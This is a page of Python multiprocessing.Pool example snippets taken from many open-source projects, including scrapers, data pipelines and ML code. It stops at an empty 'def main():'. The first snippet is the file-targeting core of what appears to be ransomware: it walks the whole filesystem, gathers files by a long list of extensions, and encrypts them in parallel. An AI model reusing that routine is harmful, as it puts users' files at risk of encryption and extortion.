Python multiprocessing module: Pool() example source code

The following 50 code examples, extracted from open-source Python projects, illustrate how to use multiprocessing.Pool().
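Before the project excerpts, here is a minimal, self-contained sketch of the basic pattern most of them follow (the worker function and inputs are placeholders, not taken from any project below):

from multiprocessing import Pool

def square(x):
    # Worker function; must be defined at module level so it can be pickled.
    return x * x

if __name__ == '__main__':
    # The context manager calls terminate() on exit (Python 3.3+).
    with Pool(processes=4) as pool:
        results = pool.map(square, range(10))
    print(results)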

Project: Cypher    Author: NullArray
def select_files():

    ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv", 
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
       ".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
       ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"]

    files_to_enc = []
    for root, dirs, files in os.walk("/"):
        for file in files:
            if file.endswith(tuple(ext)):
                files_to_enc.append(os.path.join(root, file))

    # Parallelize execution of encryption function over four subprocesses
    pool = Pool(processes=4)
    pool.map(single_arg_encrypt_file, files_to_enc)
Project: NordVPN-NetworkManager    Author: Chadsr
def get_best_servers(server_list, ping_attempts, valid_protocols):
    manager = multiprocessing.Manager()
    best_servers = manager.dict()

    num_servers = len(server_list)
    num_processes = get_num_processes(num_servers)

    pool = multiprocessing.Pool(num_processes, maxtasksperchild=1)
    pool.map(partial(compare_server, best_servers=best_servers, ping_attempts=ping_attempts, valid_protocols=valid_protocols), server_list)
    pool.close()

    return best_servers
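A reduced sketch of the same pattern, using nothing beyond the standard library: a Manager-backed dict collects results written by the workers, and functools.partial binds the fixed arguments (all names here are placeholders):

import multiprocessing
from functools import partial

def record_length(results, item):
    # The DictProxy can be passed to workers and written to from any process.
    results[item] = len(item)

if __name__ == '__main__':
    manager = multiprocessing.Manager()
    results = manager.dict()
    # maxtasksperchild=1 recycles each worker process after a single task.
    pool = multiprocessing.Pool(2, maxtasksperchild=1)
    pool.map(partial(record_length, results), ['alpha', 'beta', 'gamma'])
    pool.close()
    pool.join()
    print(dict(results))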
Project: data_pipeline    Author: Yelp
def close(self):
        try:
            logger.debug("Starting to close pooled producer")
            super(PooledKafkaProducer, self).close()
            assert self.message_buffer_size == 0
            logger.debug("Closing the pool")
            self.pool.close()
            logger.debug("Pool is closed.")
        except:
            logger.error("Exception occurred when closing pooled producer.")
            raise
        finally:
            # The processes in the pool should be cleaned up in all cases. The
            # exception will be re-thrown if there is one.
            #
            # Joining pools can be flaky in CPython 2.6, and the message buffer
            # size is zero here, so terminating the pool is safe and ensures that
            # join always works.
            self.pool.terminate()
            self.pool.join()
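A stripped-down illustration of that shutdown ordering (the worker is a placeholder): terminate() stops the workers immediately, and join() afterwards always returns, which is why the snippet keeps both in the finally block.

from multiprocessing import Pool

def work(x):
    return x + 1

if __name__ == '__main__':
    pool = Pool(2)
    try:
        print(pool.map(work, range(4)))
    finally:
        # Stop the workers unconditionally, then wait for them to exit.
        pool.terminate()
        pool.join()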
Project: ComicSpider    Author: QuantumLiu
def download_chapter_m(self):
        '''
        Download all pages of the chapter using multiprocessing
        '''
        results=[]
        if not self.pages:
            print('No page')
            return None
        mp=Pool(min(8,max(cpu_count(),4)))
        for page in self.pages:
            results.append(mp.apply_async(self.download_page,(page,)))
        mp.close()
        mp.join()
        num=sum([result.get() for result in results])
        print('Downloaded {} pages'.format(num))
Project: PyWebRunner    Author: IntuitiveWebSolutions
def main():
    global ARGS

    parser = argparse.ArgumentParser(description='Run a PyWebRunner YAML/JSON script.')
    parser.add_argument('-b', '--browser', help='Which browser to load. Defaults to Chrome.')
    parser.add_argument('--base-url', help='Base URL to use with goto command.')
    parser.add_argument('-t', '--timeout', help='Global wait timeout (in seconds). Defaults to 30.')
    parser.add_argument('-p', '--processes', help='Number of processes (browsers) to use. Defaults to 1')
    parser.add_argument('-do', '--default-offset', help='New default offset for scroll_to_element. (Default is 0)')
    parser.add_argument('--errors', dest='errors', action='store_true', help='Show errors.')
    parser.add_argument('--focus', dest='focus', action='store_true', help='Focus the browser on launch.')
    parser.add_argument('-v', '--verbose', dest='verbose', action='store_true', help='Verbose output of commands being executed.')
    parser.add_argument('files', nargs='*')
    ARGS = parser.parse_args()

    processes = ARGS.processes or 1
    pool = Pool(int(processes))

    pool.map(run_test, ARGS.files)

    pool.close()
    pool.join()
Project: ProtScan    Author: gianlucacorrado
def multiprocess_find_blocks(profiles, window, n_blocks=None,
                             block_size=None, n_jobs=-1):
    """Find blocks in profiles (parallel version)."""
    intervals = compute_intervals(
        size=len(profiles), n_blocks=n_blocks, block_size=block_size)
    if n_jobs == -1:
        pool = mp.Pool()
    else:
        pool = mp.Pool(n_jobs)
    results = [apply_async(pool, serial_find_blocks,
                           args=(dict(profiles.items()[start:end]),
                                 window))
               for start, end in intervals]
    dicts = [p.get() for p in results]
    pool.close()
    pool.join()
    blocks = {k: v for d in dicts for k, v in d.items()}
    return blocks
Project: astrobase    Author: waqasbhatti
def townsend_lombscargle_wrapper(task):
    '''
    This wraps the function above for use with mp.Pool.

    task[0] = times
    task[1] = mags
    task[2] = omega

    '''

    try:
        return townsend_lombscargle_value(*task)

    # if the LSP calculation fails for this omega, return a npnan
    except Exception as e:
        return npnan
Project: Harmonbot    Author: Harmon758
def calculate(self, *, equation : str):
        '''Calculator'''
        #_equation = re.sub("[^[0-9]+-/*^%\.]", "", equation).replace('^', "**") #words
        replacements = {"pi" : "math.pi", 'e' : "math.e", "sin" : "math.sin", "cos" : "math.cos", "tan" : "math.tan", '^' : "**"}
        allowed = set("0123456789.+-*/^%()")
        for key, value in replacements.items():
            equation = equation.replace(key, value)
        equation = "".join(character for character in equation if character in allowed)
        print("Calculated " + equation)
        with multiprocessing.Pool(1) as pool:
            async_result = pool.apply_async(eval, (equation,))
            future = self.bot.loop.run_in_executor(None, async_result.get, 10.0)
            try:
                result = await asyncio.wait_for(future, 10.0, loop = self.bot.loop)
                await self.bot.embed_reply("{} = {}".format(equation, result))
            except discord.errors.HTTPException:
                await self.bot.embed_reply(":no_entry: Output too long")
            except SyntaxError:
                await self.bot.embed_reply(":no_entry: Syntax error")
            except ZeroDivisionError:
                await self.bot.embed_reply(":no_entry: Error: Division by zero")
            except (concurrent.futures.TimeoutError, multiprocessing.context.TimeoutError):
                await self.bot.embed_reply(":no_entry: Execution exceeded time limit")
Project: AutoSleepScorerDev    Author: skjerns
def get_all_features_m(data):
    """
    returns a vector with extraced features
    :param data: datapoints x samples x dimensions (dimensions: EEG,EMG, EOG)
    """
    p = Pool(3)
    t1 = p.apply_async(feat_eeg,(data[:,:,0],))
    t2 = p.apply_async(feat_eog,(data[:,:,1],))
    t3 = p.apply_async(feat_emg,(data[:,:,2],))
    eeg = t1.get(timeout = 1200)
    eog = t2.get(timeout = 1200)
    emg = t3.get(timeout = 1200)
    p.close()
    p.join()

    return np.hstack([eeg,emg,eog])
Project: backend.ai-client-py    Author: lablup
def create_kernels(concurrency, parallel=False):
    kernel_ids = []
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(concurrency)
        results = pool.map(run_create_kernel, range(concurrency))
        for t, kid in results:
            times_taken.append(t)
            kernel_ids.append(kid)
    else:
        for _idx in range(concurrency):
            t, kid = run_create_kernel(_idx)
            times_taken.append(t)
            kernel_ids.append(kid)

    print_stat('create_kernel', times_taken)
    return kernel_ids
Project: backend.ai-client-py    Author: lablup
def execute_codes(kernel_ids, parallel=False):
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(len(kernel_ids))
        results = pool.map(run_execute_code, kernel_ids)
        for t in results:
            if t is not None:
                times_taken.append(t)
    else:
        for kid in kernel_ids:
            t = run_execute_code(kid)
            if t is not None:
                times_taken.append(t)

    print_stat('execute_code', times_taken)
Project: backend.ai-client-py    Author: lablup
def restart_kernels(kernel_ids, parallel=False):
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(len(kernel_ids))
        results = pool.map(run_restart_kernel, kernel_ids)
        for t in results:
            if t is not None:
                times_taken.append(t)
    else:
        for kid in kernel_ids:
            t = run_restart_kernel(kid)
            if t is not None:
                times_taken.append(t)

    print_stat('restart_kernel', times_taken)
Project: backend.ai-client-py    Author: lablup
def destroy_kernels(kernel_ids, parallel=False):
    times_taken = []

    if parallel:
        pool = multiprocessing.Pool(len(kernel_ids))
        results = pool.map(run_destroy_kernel, kernel_ids)
        for t in results:
            if t is not None:
                times_taken.append(t)
    else:
        for kid in kernel_ids:
            t = run_destroy_kernel(kid)
            if t is not None:
                times_taken.append(t)

    print_stat('destroy_kernel', times_taken)
Project: mongodb_consistent_backup    Author: Percona-Lab
def __init__(self, manager, config, timer, base_dir, backup_dir, tailed_oplogs, backup_oplogs):
        super(Resolver, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir)
        self.tailed_oplogs = tailed_oplogs
        self.backup_oplogs = backup_oplogs

        self.compression_supported = ['none', 'gzip']
        self.resolver_summary      = {}
        self.resolver_state        = {}

        self.running   = False
        self.stopped   = False
        self.completed = False
        self._pool     = None
        self._pooled   = []
        self._results  = {}
        try:
            self._pool = Pool(processes=self.threads(None, 2))
        except Exception, e:
            logging.fatal("Could not start oplog resolver pool! Error: %s" % e)
            raise Error(e)
Project: mongodb_consistent_backup    Author: Percona-Lab
def __init__(self, manager, config, timer, base_dir, backup_dir, **kwargs):
        super(Rsync, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir, **kwargs)
        self.backup_location = self.config.backup.location
        self.backup_name     = self.config.backup.name
        self.remove_uploaded = self.config.upload.remove_uploaded
        self.retries         = self.config.upload.retries
        self.thread_count    = self.config.upload.threads
        self.rsync_path      = self.config.upload.rsync.path
        self.rsync_user      = self.config.upload.rsync.user
        self.rsync_host      = self.config.upload.rsync.host
        self.rsync_port      = self.config.upload.rsync.port
        self.rsync_ssh_key   = self.config.upload.rsync.ssh_key
        self.rsync_binary    = "rsync"

        self.rsync_flags   = ["--archive", "--compress"]
        self.rsync_version = None
        self._rsync_info   = None

        self._pool = Pool(processes=self.threads())
Project: OptML    Author: johannespetrat
def fit(self, X_train, y_train, X_test=None, y_test=None):
        """
        """
        if (X_test is None) and (y_test is None):
            X_test = X_train
            y_test = y_train
        elif (X_test is None) or (y_test is None):
            raise MissingValueException("Need to provide 'X_test' and 'y_test'")

        fun = partial(objective, deepcopy(self.model), 
                                 deepcopy(self.model_module), 
                                 deepcopy(self.eval_func),
                                 X_train, y_train, X_test, y_test)
        pool = Pool(self.n_jobs)
        scores = pool.map(fun, deepcopy(self.grid))
        self.hyperparam_history = scores

        best_params, best_model = self.get_best_params_and_model()
        return best_params, best_model
Project: untwist    Author: IoSR-Surrey
def __call__(self, process_func):

        def wrapper(*args):
            data_obj = args[1]
            if (len(data_obj.shape) <= self.input_dim
                or data_obj.shape[-1] == 1):
                return process_func(*args)
            else:
                pool = mp.Pool(mp.cpu_count())# TODO: make configurable
                arglist = [
                    (args[0],) +
                    (data_obj[...,i],) +
                    args[2:]
                    for i in range(data_obj.shape[-1])
                ]
                result = pool.map(self.worker, arglist)
                if self.output_dim > self.input_dim: # expanding
                    return np.stack(result, -1)
                else: # contracting
                    return np.concatenate(result, -1)
        return wrapper
Project: povsim    Author: mechaphish
def _multitest_binary_pov(self, pov_path, cb_path, enable_randomness, debug, bitflip, timeout, times):

            pool = Pool(processes=4)

            res = [pool.apply_async(self._test_binary_pov,
                                    (pov_path, cb_path, enable_randomness, debug, bitflip, timeout))
                                    for _ in range(times)]

            results = [ ]
            for r in res:
                try:
                    results.append(r.get(timeout=timeout + 5))
                except TimeoutError:
                    results.append(False)

            return results
Project: Software-Architecture-with-Python    Author: PacktPublishing
def batch_files(pool_size, limit):
    """ Create batches of files to process by a multiprocessing Pool """

    batch_size = limit // pool_size

    filenames = []

    for i in range(pool_size):
        batch = []
        for j in range(i*batch_size, (i+1)*batch_size):
            filename = 'numbers/numbers_%d.txt' % j
            batch.append(filename)

        filenames.append(batch)

    return filenames
Project: pymotw3    Author: reingart
def __init__(self, map_func, reduce_func, num_workers=None):
        """
        map_func

          Function to map inputs to intermediate data. Takes as
          argument one input value and returns a tuple with the
          key and a value to be reduced.

        reduce_func

          Function to reduce partitioned version of intermediate
          data to final output. Takes as argument a key as
          produced by map_func and a sequence of the values
          associated with that key.

        num_workers

          The number of workers to create in the pool. Defaults
          to the number of CPUs available on the current host.
        """
        self.map_func = map_func
        self.reduce_func = reduce_func
        self.pool = multiprocessing.Pool(num_workers)
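Independent of the class above, a minimal sketch of the map/partition/reduce idea with a Pool handling only the map step (the word-count functions are placeholders):

import collections
import itertools
import multiprocessing

def map_words(line):
    # Map step: emit one (key, value) pair per word.
    return [(word.lower(), 1) for word in line.split()]

def reduce_counts(item):
    # Reduce step: sum the values collected for one key.
    key, values = item
    return key, sum(values)

if __name__ == '__main__':
    lines = ['the quick brown fox', 'the lazy dog']
    with multiprocessing.Pool() as pool:
        mapped = pool.map(map_words, lines)
    partitioned = collections.defaultdict(list)
    for key, value in itertools.chain(*mapped):
        partitioned[key].append(value)
    print(sorted(reduce_counts(item) for item in partitioned.items()))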
Project: glassdoor-analysis    Author: THEdavehogue
def multi_scrub_text(reviews):
    '''
    Function to lemmatize text - utilizes multiprocessing for parallelization

    INPUT:
        reviews: array-like, pandas DataFrame column containing review texts

    OUTPUT:
        lemmatized: pandas DataFrame column with cleaned texts
    '''
    lemmatized = []
    cpus = cpu_count() - 1
    pool = Pool(processes=cpus)
    lemmatized = pool.map(lemmatize_text, reviews)
    pool.close()
    pool.join()
    return lemmatized
Project: glassdoor-analysis    Author: THEdavehogue
def multi_core_scrape(num_pages, db_coll):
    '''
    Map the API scrape across (number of processors - 1) processes for a performance boost.

    INPUT:
        num_pages: int, number of pages to scrape
        db_coll: pymongo collection object, collection to add documents to

    OUTPUT:
        None, records inserted into MongoDB
    '''
    cpus = cpu_count() - 1
    pool = Pool(processes=cpus)
    pages = range(1, num_pages + 1)
    employers = pool.map(scrape_api_page, pages)
    pool.close()
    pool.join()
    print 'Inserting Employer Records into MongoDB . . .'
    pbar = ProgressBar()
    for page in pbar(employers):
        db_coll.insert_many(page)
Project: tianchi_power    Author: lvniqi
def predict_tf_all(path = None):
    result_list = []
    p = m_Pool(31)
    result_list = p.map(predict_tf_once,range(1,32))
    p.close()
    p.join()
    print 'writing...'
    result_df = pd.DataFrame(index = range(1))
    for day,result in result_list:
        day_s = str(day)
        if len(day_s)<=1:
            day_s = '0'+day_s
        result_df['201610'+day_s] = result
    result_df = result_df.T
    result_df.columns = ['predict_power_consumption']
    if path == None:
        date = str(pd.Timestamp(time.ctime())).replace(' ','_').replace(':','_')
        path = './result/'+date+'.csv'
    result_df.to_csv(path,index_label='predict_date')

    l = map(lambda day:pd.DataFrame.from_csv('./result/predict_part/%d.csv'%day),range(1,32))
    t = pd.concat(l)
    t.to_csv('./result/predict_part/'+date+'.csv')
Project: tianchi_power    Author: lvniqi
def make_month_features_all():
    pw_df_list = []
    dataset = get_dataset()
    dataset.power_consumption = dataset.power_consumption.apply(np.log)
    for user_id in get_user_id_list():
        print user_id
        if not check_empty(user_id):
            user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(0)
            #add to list
            pw_df_list.append((user_id,user_df))
            #make_features(user_id,user_df)

    p = m_Pool(64)
    for arg in pw_df_list:
        #p.apply_async(make_features,args=(arg))
        p.apply_async(make_month_features,args=(arg))

    print 'Waiting for all subprocesses done...'
    p.close()
    p.join()
Project: tianchi_power    Author: lvniqi
def make_history_month_features_all():
    pw_df_list = []
    dataset = get_dataset()
    dataset.power_consumption = dataset.power_consumption
    for user_id in get_user_id_list():
        print user_id
        if not check_empty(user_id):
            user_df = filter_user_id(dataset,user_id).resample('1D').mean().fillna(1)
            #add to list
            pw_df_list.append((user_id,user_df))
            #make_features(user_id,user_df)

    p = m_Pool(64)
    for arg in pw_df_list:
        p.apply_async(make_history_month_features,args=(arg))

    print 'Waiting for all subprocesses done...'
    p.close()
    p.join()
Project: PyFunt    Author: dnlcrl
def _reset(self):
        '''
        Set up some book-keeping variables for optimization. Don't call this
        manually.
        '''
        # Set up some variables for book-keeping
        self.epoch = 0
        self.best_val_acc = 0
        self.best_params = {}
        self.loss_history = []
        self.val_acc_history = []
        self.train_acc_history = []
        self.pbar = None

        # Make a deep copy of the optim_config for each parameter
        self.optim_configs = {}
        self.params, self.grad_params = self.model.get_parameters()
        # self.weights, _ = self.model.get_parameters()
        for p in range(len(self.params)):
            d = {k: v for k, v in self.optim_config.iteritems()}
            self.optim_configs[p] = d

        self.multiprocessing = bool(self.num_processes-1)
        if self.multiprocessing:
            self.pool = mp.Pool(self.num_processes, init_worker)
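The initializer argument runs once in each child process before it accepts tasks; init_worker above is the project's own helper, but a common use (assumed here for illustration, not confirmed from the source) is to ignore SIGINT in the workers so Ctrl-C is handled only by the parent:

import multiprocessing
import signal

def init_worker():
    # Assumption for illustration: ignore SIGINT so KeyboardInterrupt
    # is delivered to the parent process rather than to every worker.
    signal.signal(signal.SIGINT, signal.SIG_IGN)

def work(x):
    return x * 2

if __name__ == '__main__':
    pool = multiprocessing.Pool(2, init_worker)
    try:
        print(pool.map(work, range(4)))
    finally:
        pool.terminate()
        pool.join()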
Project: Generative-ConvACs    Author: HUJI-Deep
def classify(self,X,Y, use_normalized=True, mask=None):
        if self._use_whitened_similarity:
            self.precompute_marginals()
            self._pool = Pool(initializer=init_worker, initargs=(self._num_instances,
                self._conv_param.kernel_h, self._conv_param.kernel_w, self._conv_param.pad[0],
                self._conv_param.stride[0], self._im2col_indices, self._pdfs))
        probs, preds = self.collect_probs(X, Y, use_normalized, mask=mask)
        self._prob_mat = probs
        self._Y_hat = preds
        self._Y = Y
        self._tested = True
        if self._use_whitened_similarity:
            self._pool.close()
            self._pool.join()
            self._pool = None
            self._pdfs = None
Project: xenoGI    Author: ecbush
def runBlast(fastaFilePath,blastFilePath,blastCLine,numThreads):
    '''Run blast comparing every database against every other in
fastaFilePath. Save to the directory indicated by blastFilePath, using
the blast parameters in blastCLine.'''

    # format the databases
    dbFileL=glob.glob(fastaFilePath)
    formatDb(dbFileL)

    # create blast directory


    # if directory for blast doesn't exist yet, make it
    blastDir = blastFilePath.split("*")[0]
    if glob.glob(blastDir)==[]:
        os.mkdir(blastDir)

    clineL =  makeBlastClineList(dbFileL,fastaFilePath,blastFilePath,blastCLine)

    p=Pool(numThreads)
    stderrL = p.map(subprocessWrapper, clineL)

    return
Project: TC-Lung_nodules_detection    Author: Shicoder
def process_images(delete_existing=False, only_process_patient=None):
    if delete_existing and os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
        print("Removing old stuff..")
        if os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
            shutil.rmtree(settings.VALIDATION_EXTRACTED_IMAGE_DIR)

    if not os.path.exists(settings.VALIDATION_EXTRACTED_IMAGE_DIR):
        os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR)
        # os.mkdir(settings.VALIDATION_EXTRACTED_IMAGE_DIR + "_labels/")

    for subject_no in range(settings.VAL_SUBSET_START_INDEX, settings.VAL_SUBSET_TRAIN_NUM):
        src_dir = settings.RAW_SRC_DIR + "val_subset0" + str(subject_no) + "/"
        src_paths = glob.glob(src_dir + "*.mhd")

        if only_process_patient is None and True:
            pool = multiprocessing.Pool(8)
            pool.map(process_image, src_paths)
        else:
            for src_path in src_paths:
                print(src_path)
                if only_process_patient is not None:
                    if only_process_patient not in src_path:
                        continue
                process_image(src_path)
Project: TC-Lung_nodules_detection    Author: Shicoder
def process_images(delete_existing=False, only_process_patient=None):
    if delete_existing and os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
        print("Removing old stuff..")
        if os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
            shutil.rmtree(settings.TRAIN_EXTRACTED_IMAGE_DIR)

    if not os.path.exists(settings.TRAIN_EXTRACTED_IMAGE_DIR):
        os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR)
        os.mkdir(settings.TRAIN_EXTRACTED_IMAGE_DIR + "_labels/")

    for subject_no in range(settings.TRAIN_SUBSET_START_INDEX, settings.TRAIN_SUBSET_TRAIN_NUM):
        src_dir = settings.RAW_SRC_DIR + "train_subset0" + str(subject_no) + "/"
        src_paths = glob.glob(src_dir + "*.mhd")

        if only_process_patient is None and True:
            pool = multiprocessing.Pool(6)
            pool.map(process_image, src_paths)
        else:
            for src_path in src_paths:
                print(src_path)
                if only_process_patient is not None:
                    if only_process_patient not in src_path:
                        continue
                process_image(src_path)
Project: cortex    Author: rdevon
def save_images(nifti_files, anat, roi_dict, out_dir, **kwargs):
    '''Saves multiple nifti images using multiprocessing.

    Uses `multiprocessing`.

    Args:
        nifti_files (list): list of nifti file paths.
        anat (nipy.core.api.image.image.Image): anatomical image.
        roi_dict (dict): dictionary of cluster dictionaries.
        out_dir (str): output directory path.
        **kwargs: extra keyword arguments.

    '''
    p = mp.Pool(30)
    idx = [int(f.split('/')[-1].split('.')[0]) for f in nifti_files]
    args_iter = itertools.izip(nifti_files,
                               itertools.repeat(anat),
                               [roi_dict[i] for i in idx],
                               [path.join(out_dir, '%d.png' % i) for i in idx],
                               idx)

    p.map(save_helper, args_iter)
    p.close()
    p.join()
Project: census-loader    Author: minus34
def multiprocess_csv_import(work_list, settings, logger):
    pool = multiprocessing.Pool(processes=settings['max_concurrent_processes'])

    num_jobs = len(work_list)

    results = pool.imap_unordered(run_csv_import_multiprocessing, [[w, settings] for w in work_list])

    pool.close()
    pool.join()

    result_list = list(results)
    num_results = len(result_list)

    if num_jobs > num_results:
        logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts")

    for result in result_list:
        if result != "SUCCESS":
            logger.info(result)
Project: census-loader    Author: minus34
def multiprocess_list(mp_type, work_list, settings, logger):
    pool = multiprocessing.Pool(processes=settings['max_concurrent_processes'])

    num_jobs = len(work_list)

    if mp_type == "sql":
        results = pool.imap_unordered(run_sql_multiprocessing, [[w, settings] for w in work_list])
    else:
        results = pool.imap_unordered(run_command_line, work_list)

    pool.close()
    pool.join()

    result_list = list(results)
    num_results = len(result_list)

    if num_jobs > num_results:
        logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts")

    for result in result_list:
        if result != "SUCCESS":
            logger.info(result)
Project: census-loader    Author: minus34
def multiprocess_shapefile_load(work_list, settings, logger):
    pool = multiprocessing.Pool(processes=settings['max_concurrent_processes'])

    num_jobs = len(work_list)

    results = pool.imap_unordered(intermediate_shapefile_load_step, [[w, settings] for w in work_list])

    pool.close()
    pool.join()

    result_list = list(results)
    num_results = len(result_list)

    if num_jobs > num_results:
        logger.warning("\t- A MULTIPROCESSING PROCESS FAILED WITHOUT AN ERROR\nACTION: Check the record counts")

    for result in result_list:
        if result != "SUCCESS":
            logger.info(result)
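The three census-loader helpers above share one structure; a stripped-down sketch of it (the worker and settings are placeholders):

import multiprocessing

def run_job(args):
    work_item, settings = args
    # Mirror the helpers above by returning a status string per job.
    return 'SUCCESS' if work_item % 2 == 0 else 'failed on item %d' % work_item

if __name__ == '__main__':
    work_list = list(range(5))
    settings = {'max_concurrent_processes': 2}
    pool = multiprocessing.Pool(processes=settings['max_concurrent_processes'])
    # imap_unordered yields results as workers finish, in arbitrary order.
    results = pool.imap_unordered(run_job, [[w, settings] for w in work_list])
    pool.close()
    pool.join()
    for result in results:
        if result != 'SUCCESS':
            print(result)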
Project: indexed_gzip    Author: pauldmccarthy
def check_data_valid(data, startval, endval=None):
    if endval is None:
        endval = len(data)

    chunksize = 10000000

    startval = int(startval)
    endval   = int(endval)

    offsets = np.arange(0, len(data), chunksize)
    args = []
    result = True
    for offset in offsets:
        s      = startval + offset
        e      = min(s + chunksize, endval)
        nelems = e - s
        test_chunk = data[offset:offset + nelems]
        args.append((s, e, test_chunk))

    pool = mp.Pool()
    result = all(pool.map(_check_chunk, args))
    pool.terminate()

    return result
Project: dlcli    Author: outlyerapp
def metrics(period, resolution, tag, threads, metricsfile):
    try:
        pool = Pool(processes=threads)
        period_seconds = period * 3600
        resolution_seconds = resolution * 3600

        if metricsfile:
            with open(metricsfile) as fp:
                m = json.loads(fp.read().replace('][', ','))
        else:
            m = metrics_api.get_tag_metrics(tag_name=tag, **context.settings)

        click.echo(click.style('Found: %s metrics', fg='green') % (len(m)))

        expire = partial(_expire_metric_path, period_seconds, resolution_seconds, tag)
        expired_paths = tqdm(pool.imap_unordered(expire, m))
        expired_paths = sum(filter(None, expired_paths))
        click.echo(click.style('Expired: %s metric paths', fg='green') % expired_paths)

    except Exception, e:
        print 'Cleanup metrics failed. %s' % e

    finally:
        pool.terminate()
        pool.join()
Project: proxmox-tools    Author: FredHutch
def easy_par(f, sequence):    
    from multiprocessing import Pool
    poolsize=len(sequence)
    if poolsize > 16:
        poolsize = 16
    pool = Pool(processes=poolsize)
    try:
        # f is given sequence. guaranteed to be in order
        cleaned=False
        result = pool.map(f, sequence)
        cleaned = [x for x in result if not x is None]
        #cleaned = asarray(cleaned)
        # not optimal but safe
    except KeyboardInterrupt:
        pool.terminate()
    except Exception as e:
        print('got exception: %r' % (e,))
        if not args.force:
            print("Terminating the pool")
            pool.terminate()
    finally:
        pool.close()
        pool.join()
        return cleaned
Project: siggi    Author: rieck
def load_bundle(filename, regex="^\d+", chunk=None):
    """ Load graphs from zip archive """

    pool = Pool()
    archive = zf.ZipFile(filename)

    # Determine entries and select subset if requested
    entries = archive.namelist()
    if chunk:
        entries = list(set(entries) & set(chunk))
    entries = [(archive, entry) for entry in entries]

    # Load entries in parallel
    func = partial(load_bundle_entry, regex=re.compile(regex))
    items = pool.map(func, entries)
    items = filter(lambda (g, l): g is not None, items)
    graphs, labels = zip(*items)

    archive.close()
    pool.close()
    pool.join()

    return graphs, labels
Project: facebook_group_crawler    Author: spartakos87
def fun_page(page_id,onoma):
    pp= Pool(50)
    mega_list = []
    start = time.time()
    pst = p(page_id,access_token)
    n = 50 
    group_post = group(pst,n)
    temp = 0 
    for j in group_post:
        temp += len(j)
        print(str(temp)+'/'+str(len(pst)))
        re = pp.map(pros,list(j))
        for jj in re:
            mega_list.append(jj)
    duration = (time.time()-start)/float(60)
    print ("Time:"+str(duration)+'min')
    with open(onoma,'w') as f:
        json.dump(mega_list,f)
    return mega_list
Project: paragraph2vec    Author: thunlp
def query_shards(self, query):
        """
        Return the result of applying shard[query] for each shard in self.shards,
        as a sequence.

        If PARALLEL_SHARDS is set, the shards are queried in parallel, using
        the multiprocessing module.
        """
        args = zip([query] * len(self.shards), self.shards)
        if PARALLEL_SHARDS and PARALLEL_SHARDS > 1:
            logger.debug("spawning %i query processes" % PARALLEL_SHARDS)
            pool = multiprocessing.Pool(PARALLEL_SHARDS)
            result = pool.imap(query_shard, args, chunksize=1 + len(args) / PARALLEL_SHARDS)
        else:
            # serial processing, one shard after another
            pool = None
            result = imap(query_shard, args)
        return pool, result
Project: base_function    Author: Rockyzsu
def process_pool():
    p=Pool(10)
    start=time.time()
    #q1=Queue.Queue()
    manager=Manager()
    q=manager.Queue()
    print "main start ",start
    for i in xrange(10):
        p.apply_async(sub_pool,args=(q,))
    p.close()
    p.join()
    end=time.time()

    print "process done at ",end
    #print q
    print q.get()
    '''
    while q1.empty() ==False:
        d= q1.get(True)
        print d
    '''
Project: base_function    Author: Rockyzsu
def pool_map():
    x=[i for i in range (50) if i%2==0]
    #print x

    start=time.time()
    '''
    for i in x:
        single(i)
    print "time used " , time.time()-start
    '''
    #using multiprocess
    p=Pool(2)
    s=p.map(single,x)
    p.close()
    p.join()
    print s
    print len(s)
    print "end. Time used: ",time.time()-start
Project: tts-stray    Author: tweetyf
def transTest():
    numprocs = 8  # number of worker processes
    pool = multiprocessing.Pool(processes=numprocs)
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("BBCHeadline.txt","BBCHeadline.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("1984.txt","1984.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("emma.txt","emma.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("Home.2009.eng.txt","Home.2009.eng.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("StrayBirds.txt","StrayBirds.wav","en"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("????.txt","????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("???????.txt","???????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("????????.txt","????????.wav","zh"))
    pool.apply_async(func =tts_baidu.fileToVoice , args=("????.txt","????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("????????.txt","????????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("???????.txt","???????.wav","zh"))
    #pool.apply_async(func =tts_baidu.fileToVoice , args=("??????.txt","??????.wav","zh"))
    pool.close()
    pool.join()
Project: tts-stray    Author: tweetyf
def trans_novs():
    # 249 novals gaga
    count = 0
    numprocs = 8  # number of worker processes
    pool = multiprocessing.Pool(processes=numprocs)
    files = os.listdir("./nov")
    for filename in files:
        if not os.path.isdir(filename):
            if filename.endswith("txt"):
                fname = "./nov/"+filename
                #print fname
                pool.apply_async(func =tts_baidu.fileToVoice , args=(fname,fname+".wav","zh"))
    pool.close()
    pool.join()
    #print "finish all ,total handle TTS GET() :",count
Project: GAEDataExport    Author: nikhilsaraf
def main():
